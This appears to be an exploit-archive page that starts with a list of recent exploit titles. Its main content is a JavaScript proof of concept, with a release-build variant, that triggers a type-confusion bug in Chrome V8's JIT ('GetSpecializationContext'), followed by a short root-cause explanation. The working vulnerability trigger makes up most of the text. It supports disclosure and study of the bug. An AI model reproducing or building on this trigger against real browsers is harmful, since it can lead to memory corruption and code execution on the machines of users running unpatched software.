9897272892
8 changes to exploits/shellcodes Memcached - 'memcrashed' Denial of Service Softros Network Time System Server 2.3.4 - Denial of Service Chrome V8 JIT - Simplified-lowererer IrOpcode::kStoreField_ IrOpcode::kStoreElement Optimization Bug Chrome V8 JIT - JSBuiltinReducer::ReduceObjectCreate Fails to Ensure that the Prototype is _null_ Chrome V8 JIT - 'GetSpecializationContext' Type Confusion Chrome V8 JIT - Empty BytecodeJumpTable Out-of-Bounds Read Tenda AC15 Router - Unauthenticated Remote Code Execution Joomla! Component Joomanager 2.0.0 - ' com_Joomanager' Arbitrary File Download (PoC) Joomla! Component Joomanager 2.0.0 - 'com_Joomanager' Arbitrary File Download (PoC) Joomla! Component Joomanager 2.0.0 - ' com_Joomanager' Arbitrary File Download Joomla! Component Joomanager 2.0.0 - 'com_Joomanager' Arbitrary File Download Bravo Tejari Web Portal - Cross-Site Request Forgery
47 lines
No EOL
1.1 KiB
JavaScript
47 lines
No EOL
1.1 KiB
JavaScript
PoC:
|
|
function* opt(arg = () => arg) {
|
|
let tmp = opt.x; // LdaNamedProperty
|
|
for (;;) {
|
|
arg;
|
|
yield;
|
|
|
|
function inner() {
|
|
tmp;
|
|
}
|
|
|
|
break;
|
|
}
|
|
}
|
|
|
|
for (let i = 0; i < 100000; i++) {
|
|
opt();
|
|
}
|
|
|
|
/*
|
|
PoC for release build:
|
|
function* opt(arg = () => {
|
|
arg;
|
|
this;
|
|
}, opt) {
|
|
let tmp = arg.x;
|
|
for (;;) {
|
|
arg;
|
|
yield;
|
|
|
|
tmp = {
|
|
inner() {
|
|
tmp;
|
|
}
|
|
};
|
|
}
|
|
}
|
|
|
|
for (let i = 0; i < 10000; i++) {
|
|
opt();
|
|
}
|
|
|
|
What happened:
|
|
1. The LdaNamedProperty operation "opt.x" was lowered to a graph exit in the graph builder. This set the current environment to nullptr (BytecodeGraphBuilder::ApplyEarlyReduction).
|
|
2. The environment for the next block (for-loop) was supposed to be created from merging with the previous environment, but it had been set to nullptr at 1. So the context value remained as "undefined".
|
|
3. But GetSpecializationContext directly casted the context value to Context* which resulted in type confusion.
|
|
*/ |